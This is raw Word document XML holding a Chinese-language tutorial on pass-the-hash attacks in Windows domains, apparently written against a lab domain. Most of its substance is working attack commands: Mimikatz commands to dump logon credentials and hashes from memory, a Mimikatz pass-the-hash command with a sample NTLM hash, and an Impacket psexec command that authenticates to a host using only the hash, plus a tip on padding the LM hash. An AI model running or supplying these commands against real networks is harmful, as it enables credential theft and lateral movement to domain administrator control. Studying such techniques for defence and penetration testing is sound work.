        <w:t>在域环境中，用户登录计算机一般使用的是域账户，并且大多数计算机在安装时可能会使用相同的本地管理员账户和密码。因此，在域环境中进行哈希传递往往可以批量获取内网主机权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="X46babb7c26ed818b6301d9154a237cc0747d35e"/>
      <w:r>
        <w:t>1、哈希传递攻击的利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>这里通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r>
        <w:t>项目中的常用工具来进行演示。相关的利用工具还有很多，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Evil-Winrm</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>(1)、利用Mimikatz进行PTH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ① 将Mimikatz上传到跳板机并执行以下命令，抓取用户的哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要高权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="3428365"/>
            <wp:effectExtent l="0" t="0" r="508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5481320" cy="3428365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ② 利用抓取到的域管理员的NTLM Hash进行哈希传递</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kele.lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve"> /ntlm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a39e8292b81bb373d37dd6c360647eb9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>" exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>弹出一个新的命令窗口，在新的命令行中具有域管理员权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485765" cy="2432050"/>
            <wp:effectExtent l="0" t="0" r="63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5485765" cy="2432050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>(2)、利用impacket进行PTH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Impacket中具有远程执行功能的几个脚本几乎都可以进行哈希传递攻击，常见的有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>smbexec</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>wmiexec</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:r>
        <w:t>为例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>kele.lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>/administrator@192.168.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve"> -hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a39e8292b81bb373d37dd6c360647eb9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注：有的哈希传递工具需要同时填上LMHash:NTHash，如果只获取到了NThash部分，那么LMHash部分可以用32个0替代。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4076065" cy="2481580"/>
            <wp:effectExtent l="0" t="0" r="8255"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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4076065" cy="2481580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkStart w:id="13" w:name="X72aa2e7069d6684d3f22a4d67e2b0e51e979e9e"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="13"/>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splitPgBreakAndParaMark/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiNDFjZjYyYjQ2NDczYjZjNTEwZjNjZGYxNWYzOWVjMjcifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="0246644D"/>
    <w:rsid w:val="02B20C36"/>
    <w:rsid w:val="090B4153"/>
    <w:rsid w:val="0A724DA4"/>
    <w:rsid w:val="0BB73EC2"/>
    <w:rsid w:val="0D0E2049"/>
    <w:rsid w:val="10C50619"/>
    <w:rsid w:val="15223830"/>
    <w:rsid w:val="185C46A5"/>
    <w:rsid w:val="18E54E1D"/>
    <w:rsid w:val="1A8A4524"/>
    <w:rsid w:val="1AD928F8"/>
    <w:rsid w:val="1AF1793E"/>
    <w:rsid w:val="1AF7458E"/>
    <w:rsid w:val="1BDD7AB0"/>
    <w:rsid w:val="1DD246B8"/>
    <w:rsid w:val="1ECA5C04"/>
    <w:rsid w:val="1F4D4C7E"/>
    <w:rsid w:val="227338EE"/>
    <w:rsid w:val="23F16934"/>
    <w:rsid w:val="269E1096"/>
    <w:rsid w:val="26E5164A"/>
    <w:rsid w:val="27D906D6"/>
    <w:rsid w:val="289A4F62"/>
    <w:rsid w:val="28C602E3"/>
    <w:rsid w:val="2AB462DA"/>
    <w:rsid w:val="2AE9427A"/>
    <w:rsid w:val="2DC07527"/>
    <w:rsid w:val="30E107B4"/>
    <w:rsid w:val="32156AB4"/>
    <w:rsid w:val="32D74DE9"/>
    <w:rsid w:val="32E50D6B"/>
    <w:rsid w:val="35A03B4F"/>
    <w:rsid w:val="35FE3505"/>
    <w:rsid w:val="366545FA"/>
    <w:rsid w:val="37A52597"/>
    <w:rsid w:val="37B65F00"/>
    <w:rsid w:val="394C0979"/>
    <w:rsid w:val="3B8A268D"/>
    <w:rsid w:val="3D80667C"/>
    <w:rsid w:val="3F960F72"/>
    <w:rsid w:val="3FF903C7"/>
    <w:rsid w:val="42A33B1C"/>
    <w:rsid w:val="443529EC"/>
    <w:rsid w:val="4915174E"/>
    <w:rsid w:val="493478E4"/>
    <w:rsid w:val="4D410DCB"/>
    <w:rsid w:val="4EDA624F"/>
    <w:rsid w:val="4EED4970"/>
    <w:rsid w:val="526E5E5E"/>
    <w:rsid w:val="572E05D1"/>
    <w:rsid w:val="57AE16DF"/>
    <w:rsid w:val="57DF296E"/>
    <w:rsid w:val="5B4A2D25"/>
    <w:rsid w:val="5B834497"/>
    <w:rsid w:val="5BCF0CCF"/>
    <w:rsid w:val="5C4A3EE1"/>
    <w:rsid w:val="5CED0A69"/>
    <w:rsid w:val="5FF84F72"/>
    <w:rsid w:val="608435C8"/>
    <w:rsid w:val="61B57EB2"/>
    <w:rsid w:val="620748C9"/>
    <w:rsid w:val="64D20F21"/>
    <w:rsid w:val="6AFF3C74"/>
    <w:rsid w:val="6B841E74"/>
    <w:rsid w:val="6CBF6EF4"/>
    <w:rsid w:val="6D393F68"/>
    <w:rsid w:val="6E0E3640"/>
    <w:rsid w:val="6F314319"/>
    <w:rsid w:val="6F4D30EF"/>
    <w:rsid w:val="6F685169"/>
    <w:rsid w:val="729641A8"/>
    <w:rsid w:val="75291EFC"/>
    <w:rsid w:val="75952577"/>
    <w:rsid w:val="766B42E7"/>
    <w:rsid w:val="76FC483D"/>
    <w:rsid w:val="77551288"/>
    <w:rsid w:val="79F54A66"/>
    <w:rsid w:val="7AD677AD"/>
    <w:rsid w:val="7E977C78"/>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rPr>
      <w:b/>
      <w:color w:val="008000"/>
    </w:rPr>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rPr>
      <w:color w:val="008000"/>
    </w:rPr>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9</Pages>
  <Words>2244</Words>
  <Characters>4380</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4541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2023-03-18T07:21:00Z</dcterms:created>
  <dc:creator>踏雪折梅</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-16T03:34:05Z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DEC9599D31C1405F9817BC26144B1FD5</vt:lpwstr>
  </property>
</Properties>
</file>